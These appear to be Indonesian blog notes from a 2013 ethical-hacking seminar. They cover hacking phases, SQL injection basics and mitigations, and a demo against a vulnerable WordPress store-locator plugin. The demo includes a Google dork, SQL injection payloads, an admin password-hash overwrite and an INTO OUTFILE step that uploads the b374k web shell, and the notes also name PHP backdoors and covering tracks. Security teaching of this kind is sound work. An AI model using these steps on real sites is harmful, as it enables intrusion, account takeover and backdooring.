SEMINAR HACKING
Oleh : Zaenab A. Zahra
Teka-Teki
Report Password
Web Hacking X-Code 2 Maret 2013
UIN Maulana Malik Ibrahim Malang
Pemahaman dasar ethical hacker
Keamanan komputer menjadi penting?
-
Perkembangan
komputer
-
Ketergantungan
manusia
-
Tuntutan
kompleksitas semakin tinggi
-
Keamanan
menjadi anak tiri
-
Kemampuan
orang disebut hacker menjadi menurun
-
Kemampuan
rendah bisa menjadi ancaman tinggi untuk kepentingan umum
Terminologi hacker
-
Vulnerability : mengetahui celah keamanan
-
Threat : bagaimana cara-cara yang harus
dilakukan supaya bisa masuk
-
Attack : prosees masuk/ membobol
keamanannya
-
Exploit : memanage apa yang
harus dilakukan di dalamnya
Contoh Situs yang menyediakan exploits
-
Metasploit
Frameworks
|
|
-
Exploit-db.com
|
|
-
securityfocus.com
|
|
-
Darkc0de.com
|
|
-
packetstormsecurity.org
|
Element-element keamanan (CIA)
-
Confidentiality
Keamanan informasi data untuk diketahui
atau dibaca oleh pihak yang tidak dikehendaki
-
Integrity
/ integritas
Keamanan informasi data untuk menghindari
adanya perubahan yang tidak dikehendaki
-
Availability
Keamanan informasi data untuk ketersediaan
atau keberadaannya
Triangle keamanan
Sebuah
program harusnya berada di tengah-tengahnya.
Pengelompokkan
hacker
-
Black
Hat Hacker
-
White
Hat Hacker
-
Grey
Hat Hacker
-
Suicide
Hacker
Tahapan
aktifitas Hacking
-
Reconnaissance
1.
Reconnaissance
Passive
- Pencarian data target di google
- Pencarian data target di berbagai jejaring sosial
2.
Reconnaissance
Active
- HTTP Fingerprint
-
Scanning,
pencarian berdasarkan scanning
- Google.com
- Archive Milw0rm
- Archive Exploit DB
- Metasploit Framework
- Darkc0de
-
Gaining
Acces
- Exploitasi Remote Execution pada celah keamanan OS
- Exploitasi Remote Execution pada celah keamanan aplikasi
- Exploitasi
Remote Execution pada celah keamanan web
-
Maintaining
acces
PHP Backdoor
Simple php shell
R57
C99 / C100
ASP Backdoor
B374K
-
Covering
Tracks
- Pembersihan berbagai exploit atau software yang diupload
- Pembersihan jejak disesuaikan dengan penggunaan aplikasi di
target dan ke target.
KONSEP
SQL Injection
GET
dan POST
IMPLEMENTASI
pada method GET & POST
-
Langsung
dari URL
-
Header
: Content-Type: application/x-www-form-urlencoded
-
Data
: variable=value
Query
-
$query
= “SELECT * FROM contoh WHERE nama =’$username’”;
-
$username
= dari GET atau POST
SQL
Injection
-
$query
= “SELECT namaTabel FROM contoh WHERE nama =’$username’”; DROP TABLE namaTabel;
--’
-
$query
= “SELECT
namaTabel FROM contoh WHERE nama =‘terserah‘ OR ‘x’ = ‘x’”;
Noobs…
$P$BAu2rgOUahu8hibdJ12ToW4zu6b.XB.
DEMO WEB HACKING
Wordpress Plugins - Google Maps via Store Locator Plus Multiple
Vulnerability
Vulnerability
Info
-
Description
: Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
-
Version
: 2.7.1 - 3.0.1
-
Date
: 26-05-2012
-
Google
Dork : inurl:/wp-content/plugins/store-locator-le/
SQL Injection Vuln
POST Method, Advanced REST Client
-
Method : POST
-
Header : Content-Type:
application/x-www-form-urlencoded
-
Data : query=[injection]
-
Contoh:
query=SELECT * FROM wp_users
Mengatasi Teka-Teki Hash
UPDATE
– replace password
UPDATE wp_users SET user_pass =
'$P$BAu2rgOUahu8hibdJ12ToW4zu6b.XB.' WHERE `wp_users`.`ID` =1 LIMIT 1 ;
-
Mengganti
password menjadi “Password”
Upload b374k via Query
SELECT ’[kode script]’ INTO OUTFILE
“e:/AppServ/www/ict2013/exploit.php”
http://localhost/ict2013/wp-content/plugins/store-locator-le/core/load_wp_config.php
+
diganti %2B
Base 64 Encryption
Base64 adalah
istilah umum untuk sejumlah skema pengkodean serupa yang mengkodekan data biner
dan menerjemahkannya ke dalam representasi basis 64. Istilah Base64 berasal
dari konten pengkodean MIME tertentu. (Wikipedia, 2010)
PENGAMANAN
-
Update
CMS, plugin
-
Menggunakan
mysql_real_escape_string()
-
Memberikan
validasi pada tiap inputan
-
Berikan
length limit pada inputan
-
Config
database error report
-
Setting
php.ini
-
dll
0 komentar:
Posting Komentar